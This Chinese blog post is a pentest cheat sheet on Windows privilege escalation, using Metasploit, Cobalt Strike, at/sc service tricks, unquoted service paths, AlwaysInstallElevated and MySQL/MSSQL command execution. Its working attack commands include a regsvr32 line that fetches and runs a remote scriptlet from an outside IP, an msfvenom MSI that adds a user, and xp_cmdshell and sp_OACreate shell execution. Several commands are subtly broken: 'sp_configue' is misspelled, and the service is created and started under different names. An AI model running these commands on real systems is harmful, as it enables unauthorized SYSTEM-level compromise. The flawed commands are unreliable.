内网的Windows提权基础

编程入门行业动态更新时间:2024-10-25 22:35:47

内网的Windows提权基础

Windows提权基础

工具提权

msf提权

首先生成payload

配置msf

提权getsystem

因为uac，直接使用这个可能会失败

选择一个bypassuac

search bypassuac

windows/local/bypassuac_silentcleanup)

漏洞提权

补丁查询
- 提权辅助页
- windows-expliot-suggester

查看补丁

run post/windows/gather/enum_patches

cs提权

getsystem
bypassuac：Access->Elevate(提权模块)->选择内置的功能模块->设置监听->执行

漏洞提权

命令提权

一些命令是有system权限的

2003

at命令：一个发布定时任务计划的命令行工具，默认以SYSTEM权限运行
命令行内执行：
at 10:30AM /interactive cmd
whoami //可看到是system权限

用at打开system权限的msf
msf:
use exploit/multi/script/web_delivery
完成设置并执行

给出一条语句

将其在cmd下用at执行.例如：
at 11:21AM /interactive regsvr32 /s /n /u /i:http://192.168.95.128:8080/5ThLnkA3C.sct scrobj.dll

执行失败，可以使用木马执行

执行后，msf会收到一个会话，system权限
at 10:30AM /interactive c:\3.exe

和前面一样

windows 7/8/08/12/16

sc命令：用于与服务控制管理器和服务进行通信的命令行程序，提供功能类似“服务”
创建一个名叫system的新交互式的cmd服务
sc Create syscmd binPath="cmd /K start" type=own type=interact
然后执行
sc start systcmd
即得到一个system权限的cmd环境

配置提权

不带引号的服务路径

当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例
- 查看错误配置的路径
```
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
```
- 查看是否自启动：sc qc +服务
- 此外，msf中也有集成模块：exploit/windows/local/trusted_service_path
弱文件夹权限
1. 第一步寻找运行任意用户修改的服务，并且权限是最高权限用户所执行的
2. 得到所有用户都可以访问的结果后，生成一个exe将其改名为服务启动的exe替换
3. 重启系统
弱服务提权
- msf模块：exploit/windows/local/service_permissions
注册表权限不足（实用较少）
AlwaysInstallElevated
- 一种允许非管理用户以SYSTEM权限运行Microsoft Windows安装程序包（.MSI文件）的设置。默认情况下禁用，需系统管理员手动启用
- 查询是否存在漏洞
```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
或者
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
- 若存在漏洞，则可使用msfvenom生成msi文件，进行提权
```
msfvenom -p windows/adduser USER=test000 PASSWORD=password123! -f msi -o rotten.msi
```
- 然后使用，即可
```
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
```
- msf模块：exploit/windows/local/always_install_elevated
powerup
- powershell下面的一个子模块
- 导入模块：Import-Module .\PowerUp.psm1
- 执行所有的脚本来检查：Invoke-AllChecks

Mysql提权

mysql提权（3306）
- 要求
  
  系统要求win7以下版本
  
  数据库要求不能大于5.7
  
  root权限
  
  没有开启安全模式
- 通过udf
  - mysql的拓展接口，用户的自定义函数。创建此函数需要调用一些东西，调用时会默认将此时的账号转换为system权限
  - 系统要求：win7以下版本可使用
  - 数据库版本小于5.7，具有root权限，没有开启安全模式
  - 提权
    - SQLmap：sqlmap -d “mysql://root:root@ip:3306/mysql” --os-shell
    - 用大马手动提权：dll
    - 手动提权tips:
      - mysql版本大于5.1：dll导出到MySQL下 lib\plugin目录
      - 小于5.1：导出到 c:\windows\system32 (2003)

mssql提权（1433）

调用存储过程-sa权限（执行语句）

xp_cmdshell

开启
EXEC sp_configue 'show advanced options',1;RECONFIGURE;
EXEC sp_configue 'xp_cmdshell',1;RECONFIGURE;

关闭
EXEC sp_configue 'show advanced options',1;RECONFIGURE;
EXEC sp_configue 'xp_cmdshell',0;RECONFIGURE

执行:EXEC master..xp_cmdshell 'whoami';

sp_OACreate

可以删除、复制、移动文件，默认无回显

开启
EXEC sp_configue 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configue 'Ole Automation Procedures',1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configue 'show advanced options',0;
利用并重定向到who.txt文件
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >C:\who.txt'
利用方法2
declare @o int:
exec sp_oacreate 'Shell.Application',@o out;
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >C:\test.txt','c:\windows\system32','','1';

更多推荐

内网的Windows提权基础

本文发布于:2023-07-28 15:44:31，感谢您对本站的认可！

本文链接:https://www.elefans.com/category/jswz/34/1239306.html